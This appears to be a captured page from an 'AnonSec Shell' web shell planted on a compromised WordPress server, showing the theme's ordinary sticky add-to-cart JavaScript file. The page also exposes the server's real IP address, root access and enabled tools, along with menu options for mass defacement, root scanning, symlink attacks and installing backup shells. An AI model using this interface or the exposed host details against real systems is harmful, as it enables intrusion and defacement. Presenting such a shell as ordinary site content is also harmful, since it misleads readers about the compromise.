AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/wp-content/themes/astra/assets/js/unminified/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/wp-content/themes/astra/assets/js/unminified/sticky-add-to-cart.js
(function () {

    // Triggers sticky add to cart on scroll.
    const astraStickyAddToCart = document.querySelector(".ast-sticky-add-to-cart");

    if (astraStickyAddToCart) {
        const scrollOffset = document.querySelector('.product .single_add_to_cart_button').offsetTop;
        window.addEventListener("scroll", function () {
            if (window.scrollY >= scrollOffset) {
                astraStickyAddToCart.classList.add('is-active');
            } else {
                astraStickyAddToCart.classList.remove('is-active');
            }
        })
    }

    // Smooth scrolls if select option button is active.
    const AstraSmoothScrollBtn = document.querySelector(".ast-sticky-add-to-cart-action-wrap .single_link_to_cart_button");
    const element = document.querySelector(".single_add_to_cart_button");

    if (AstraSmoothScrollBtn && element) {
        const headerOffset = 230;
        const elementPosition = document.querySelector('.single_add_to_cart_button').offsetTop;
        if (elementPosition) {
            const offsetPosition = elementPosition - headerOffset;

            if (offsetPosition) {
                AstraSmoothScrollBtn.addEventListener('click', function (e) {
                    e.preventDefault();
                    window.scrollTo({
                        top: offsetPosition,
                        behavior: "smooth"
                    });
                });
            }
        }
    }

})();

Anon7 - 2022
AnonSec Team